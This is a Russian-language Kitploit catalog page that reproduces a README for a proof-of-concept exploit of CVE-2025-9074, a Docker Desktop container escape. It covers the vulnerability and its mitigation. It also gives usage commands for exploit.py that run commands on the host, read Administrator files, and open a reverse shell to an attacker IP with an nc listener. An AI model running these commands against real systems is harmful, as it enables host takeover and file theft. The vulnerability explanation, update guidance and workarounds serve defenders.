Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-9074-Docker-Desktop-Container-Escape — Эксплоит Proof of Concept для CVE-2025-9074 - неаутентифицированный побег из контейнера Docker Engine API, затрагивающий Docker Desktop < 4.44.3 на Windows и macOS (CVSS 9.3) | Kitploit
Инструменты/GitHubGitHub/ptechamanja/cve-2025-9074-docker-desktop-container-escape
Безопасность контейнеровАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеБезопасность облачных средRed TeamingПобег из Контейнера
GitHubptechamanja/cve-2025-9074-docker-desktop-container-escape

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-9074-Docker-Desktop-Container-Escape

Эксплоит Proof of Concept для CVE-2025-9074 - неаутентифицированный побег из контейнера Docker Engine API, затрагивающий Docker Desktop < 4.44.3 на Windows и macOS (CVSS 9.3)

Репозиторий
28 месяцев назадЕщё не проверено

CVE-2025-9074: PoC побега из контейнера Docker Desktop

CVE CVSS Platform

Эксплойт Proof of Concept для CVE-2025-9074 — критическая уязвимость побега из контейнера в Docker Desktop, позволяющая неавторизованный доступ к API Docker Engine.

Обзор уязвимости

СвойствоЗначение
CVE IDCVE-2025-9074
CVSS Score9.3 (Критический)
Уязвимое ПОDocker Desktop < 4.44.3
Затронутые платформыWindows, macOS (Linux не затронут)
Исправленная версияDocker Desktop 4.44.3+
ОбнаружилиFelix Boulet, Philippe Dugré
Дата обнаруженияСередина 2025
Дата исправления20 августа 2025

Технические детали

Уязвимость позволяет контейнерам, работающим в Docker Desktop, получать доступ к API Docker Engine по адресу http://192.168.65.7:2375 без аутентификации. Это происходит независимо от:

  • Настроек Enhanced Container Isolation (ECI)
  • Конфигурации "Expose daemon on tcp://localhost:2375 without TLS"
  • Любых других параметров безопасности

Воздействие

  • Windows (WSL backend): Полный захват хоста с правами администратора
  • macOS: Манипуляция контейнерами и возможный бэкдоринг (ограничено запросами пользователя)
  • Linux: Не уязвим (использует Unix-сокет вместо TCP)

Коренная причина

API Docker Engine был открыт на TCP-сокете, доступном из контейнеров, что позволяло:

  • Создавать/удалять контейнеры
  • Монтировать файловые системы хоста
  • Выполнять привилегированные команды
  • Полный обход изоляции контейнеров

Использование

изображение

Необходимые условия

root@kitploit:~
pip3 install requests

Режим выполнения команд

root@kitploit:~
# Execute a command on the host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "whoami"

# Read files from Windows host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "cat /hostfs/mnt/c/Users/Administrator/Desktop/root.txt"

# List users on Windows
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "ls -la /hostfs/mnt/c/Users"

Режим обратной оболочки

root@kitploit:~
# Terminal 1: Set up listener
nc -lvnp 4444

# Terminal 2: Execute exploit
python3 exploit.py -u http://192.168.65.7:2375 -m reverse -l <YOUR_IP> -p 4444

# Once connected, host filesystem is at: /hostfs

Изнутри контейнера

root@kitploit:~
# If you already have access to a container
curl http://192.168.65.7:2375/version

Сценарий атаки

root@kitploit:~
graph TD
    A[Malicious Container] -->|No Auth Required| B[Docker Engine API<br/>192.168.65.7:2375]
    B -->|Create Container| C[Privileged Container]
    C -->|Mount Host FS| D[Full Host Access]
    D -->|Read/Write| E[Compromise System]

Смягчение

Необходимо немедленное действие

Немедленно обновитесь до Docker Desktop 4.44.3 или новее.

root@kitploit:~
# Check your Docker Desktop version
docker --version

# Update Docker Desktop
# Windows: Download from https://desktop.docker.com/win/main/amd64/Docker%20Desktop%20Installer.exe
# macOS: Download from https://desktop.docker.com/mac/main/amd64/Docker.dmg

Временные обходные меры

Если немедленное обновление невозможно:

  1. Избегайте запуска недоверенных контейнеров
  2. Отслеживайте сетевые подключения из контейнеров
  3. Внедрите сегментацию сети
  4. Проверяйте все образы контейнеров перед развертыванием

Ссылки

  • Консультация по безопасности Docker
  • NVD CVE-2025-9074
  • Блог Felix Boulet
  • Анализ Philippe Dugré
  • Уведомление GitHub

Отказ от ответственности

Этот инструмент предоставляется только для образовательных и авторизованных целей тестирования безопасности.

  • Используйте только против систем, которыми вы владеете или на тестирование которых имеете явное разрешение
  • Неавторизованный доступ к компьютерным системам незаконен
  • Авторы не несут ответственности за неправильное использование этого программного обеспечения

Авторы

  • Обнаружение уязвимости: Felix Boulet, Philippe Dugré
  • Разработка PoC: Amanja Francisco
  • Команда безопасности Docker: За быструю реакцию и исправление

Лицензия

Лицензия MIT — подробности в файле LICENSE

Скачать инструмент